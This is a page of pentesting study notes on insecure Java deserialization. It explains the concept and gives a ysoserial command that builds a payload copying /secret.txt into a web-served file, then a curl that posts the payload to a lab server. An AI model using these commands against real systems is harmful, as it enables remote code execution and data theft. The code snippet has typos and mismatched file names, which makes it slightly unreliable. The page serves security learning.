Defender's Notes
  • Welcome!
  • Methodology
  • Ethical Hacking
  • Resources/Blogs/Conferences/Labs
  • Writing Vulnerability Reports
  • Linux Tips
  • Certifications
  • Bug Bounty
    • Hints
  • Python
  • PenTesting
    • Recon
    • Network Scanning
    • Reverse Shell Payloads
    • API Security Testing
    • 53 - DNS
    • 21 - ftp
    • 139,445 - SMB
    • 111,2049 - rcpbind
    • Authentication
    • Scripting
    • OSINT
    • Cloud Security
    • Reverse Engineering
    • Password
    • Proxy Chain
    • Steganography
    • Buffer Overflow
  • Windows
    • Recon
    • Golden/Silver Ticket
    • PowerShell for Beginners
    • Windows Priv Escalate
      • Icecast (RPC)
    • Kerberos Attack
  • Web Pentesting
    • 80,443,8080 - Recon
    • Resources
      • Burp Suite
    • Web Vulnerabilities
      • WordPress
      • CSP Bypass
      • JSON Web Tokens
      • Insecure Desensitization
      • Open Redirect
      • Command Injection
      • Path Traversals
      • SSRF
      • SQL Injection
      • IDOR
      • Shellshock
      • Heartbleed
      • Session Attacks/Bypass
      • XSS
      • XXE
      • CSRF
      • File Inclusion (Local/Remote)
      • Drupal
    • OWASP Top 10 2017
      • Top 1: Injection
      • Top 2: Broken Authentication
      • Top 3: Sensitive Data Exposure
      • Top 4: XML External Entities (XXE)
      • Top 5: Broken Access Control
      • Top 6: Security Misconfiguration
      • Top 7: Cross-Site Scripting (XSS)
      • Top 8: Insecure Deserialization
      • Top 9: Using Components with Known Vulnerabilities
      • Top 10: Insufficient Logging & Monitoring
    • OOB
    • Java
    • Python Web Security
  • Linux
    • Upgrading shell
    • Linux Priv Escalate
      • Path Variable Manipulation
      • Systemctl
  • Binary Security
    • AOT
  • Hardware Security
    • Wi-fi
    • Radio
  • Mobile Security
    • Android
    • SMS
  • Videos
    • IppSec Videos
    • The Cyber Mentor
Powered by GitBook
On this page
  • Exploitation
  • Using ysoserial tool
  • Example
  • Resources

Was this helpful?

  1. Web Pentesting
  2. Web Vulnerabilities

Insecure Desensitization

Insecure Desensitization happens in any object-oriented programming language that supports concept of serialization and deserialization. Commonly seen in Java, but can affect .NET, php, Ruby, and Python.

Serialization is the process of converting variables and objects in memory of a process into a format (stream of bytes) that can be stored or transmitted.

Deserialization is the process of converting a stream of bytes back into an object in memory of a currenty process.

Since serialized object is stored on the client side, an attacker can easily modify the serialized object. Searialized object is binary representation of the object, as long as we know how to parse (and modify) it, there is nothing preventing us from doing that.

Technologies that rely on selrialization:

  • Remote Method Invocation (RMI)

  • Java Management Extension (JMX)

  • Java Message Service (JMS)

  • Java Server Faces implementation (ViewState)

Custom implementation protocol:

InputStream is = request.getInputStream();
ObjectINputStream ois = new ObjectInputStream(oius);
ois.readObject();

Exploitation

Can modify sensitive parameters stored in serialized object.

Remote Code execution through insecure deserialization

Using ysoserial tool

java -jar ysoserial.jar [payload] '[command]'

Example

java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cp /secret.txt /opt/app/files/dummy.html' > deser.obj
base64 deser.obj > deser.b64

Send

curl -v --cookie SID=12345 --data-urlencode "obj=`cat deser-file.b64`" http://172.17.0.2:8080/API

Tools: ysoserial

Resources

PreviousJSON Web TokensNextOpen Redirect

Last updated 4 years ago

Was this helpful?

GrrrDog /Java-Deserialization-Cheat-Sheet The cheat sheet about Java Deserialization vulnerabilities:

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
Verifying
Send Cookie